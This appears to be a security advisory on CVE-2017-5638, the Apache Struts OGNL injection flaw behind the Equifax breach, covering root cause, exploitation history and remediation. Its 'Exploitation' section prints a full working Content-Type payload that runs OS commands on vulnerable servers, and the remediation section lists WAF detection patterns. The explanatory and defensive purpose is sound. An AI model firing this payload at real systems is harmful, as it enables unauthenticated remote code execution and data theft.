CVE-2017-5638

What Is Apache Struts?

Apache Struts is a widely deployed open-source MVC framework for building Java web applications, used extensively in banking, financial services, government, insurance, and enterprise IT systems. Struts-based applications process HTTP requests and responses; the Jakarta Multipart parser component handles file uploads (multipart/form-data). Because Struts applications frequently handle sensitive business transactions — loan applications, tax filings, financial account management — a Struts RCE gives attackers direct access to the application's data and the ability to pivot to connected databases.

Overview

CVE-2017-5638 is one of the most consequential vulnerabilities in cybersecurity history — a critical remote code execution flaw in Apache Struts exploited by attackers to breach Equifax and steal the personal data of 147 million Americans. The vulnerability exists in the Jakarta Multipart parser: when parsing a malformed file upload request, Struts evaluates the Content-Type header as an OGNL (Object Graph Navigation Library) expression, allowing an attacker to execute arbitrary Java code via a single crafted HTTP request with no authentication required. Fixed in Apache Struts 2.3.32 and 2.5.10.1 (March 7, 2017). Exploitation at scale began within hours of the patch release.

Affected Versions

Technical Details

Root Cause: OGNL Expression Evaluation of HTTP Header

CVE-2017-5638 is an expression language injection vulnerability (CWE-917) in Apache Struts' Jakarta Multipart parser. OGNL (Object Graph Navigation Language) is the expression language used by Struts to evaluate dynamic expressions in action parameters, validation rules, and result pages. Struts includes OGNL processing deeply integrated into request handling.

The specific flaw: When the Jakarta Multipart parser encounters a multipart file upload request with a malformed Content-Type header (one that does not conform to the expected format), it raises an exception. The exception message includes the raw Content-Type value. Struts' error handling then evaluates this exception message as an OGNL expression — trusting it as if it were an application-level expression.

Exploitation:

Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))).(#ros)}

This single HTTP request requires no authentication, no existing session, and no prior knowledge of the target beyond knowing it runs Struts — and it executes an arbitrary OS command and returns the output in the HTTP response.

Attack Characteristics

Discovery

Discovered by Man Yue Mo of Semmle (now GitHub Security Lab) and reported to the Apache Struts security team. Apache released the patch on March 7, 2017. Proof-of-concept exploit code was publicly available within hours.

Exploitation Context

• The Equifax breach: CVE-2017-5638 was used to breach Equifax — the US credit reporting agency — starting May 13, 2017, 66 days after the patch was available. Attackers had 78 days of undetected access, exfiltrating names, Social Security numbers, birth dates, addresses, driver's license numbers, and credit card numbers for 147 million Americans. The FTC imposed a $575 million settlement on Equifax in 2019.
• Equifax's failure: Equifax's security team was aware of the vulnerability and had issued internal directives to patch it; an SSL inspection tool failure caused their traffic inspection to be blind to the exploitation, and the patch was never actually applied to the vulnerable internet-facing server
• Mass exploitation within hours: Multiple threat actor groups published automated scanning and exploitation tools the same day as the patch; Struts applications on internet-facing servers globally were subjected to mass exploitation sweeps
• Ransomware delivery: CVE-2017-5638 has been used for initial access in ransomware campaigns; ransomware operators scan for vulnerable Struts apps to gain foothold for ransomware deployment
• Breadth of impact: Apache Struts is deployed in financial services, government, healthcare, and insurance sectors — industries that process the most sensitive personal and financial data; CVE-2017-5638 is the archetype of high-impact supply chain vulnerability exploitation
• CISA KEV (2021): Added November 3, 2021 as part of the initial KEV catalog launch, reflecting the landmark historical significance and continued relevance

Remediation

1. Upgrade Apache Struts — update to Struts 2.3.32+ or 2.5.10.1+ to patch CVE-2017-5638. Prioritize upgrading to the latest supported Struts release, as multiple subsequent OGNL-related vulnerabilities (S2-057, S2-059, S2-060, S2-061) affect older versions.

2. Implement a WAF rule for CVE-2017-5638 — deploy a WAF rule blocking requests with OGNL expressions in the Content-Type header as an immediate interim mitigation; the characteristic OGNL expression patterns (%{, #_=, @ognl) are distinctive and blockable.

3. Inventory all Struts deployments — perform a full inventory of applications using Apache Struts; shadow IT and legacy applications are common sources of unpatched Struts instances (as in the Equifax case).

4. Enforce TLS inspection continuity — ensure SSL/TLS inspection tools remain operational; detection failures (as in Equifax) prevent identification of exploitation attempts in HTTPS traffic.

5. Apply network segmentation for application servers — Struts application servers should not have direct internet egress; outbound connections from application servers to attacker C2 infrastructure are a key post-exploitation indicator and can be blocked by firewall egress controls.

6. Audit for post-compromise indicators — review web server logs for requests with unusual Content-Type headers; check application servers for unexpected new files, scheduled tasks, or running processes indicating web shell or implant installation.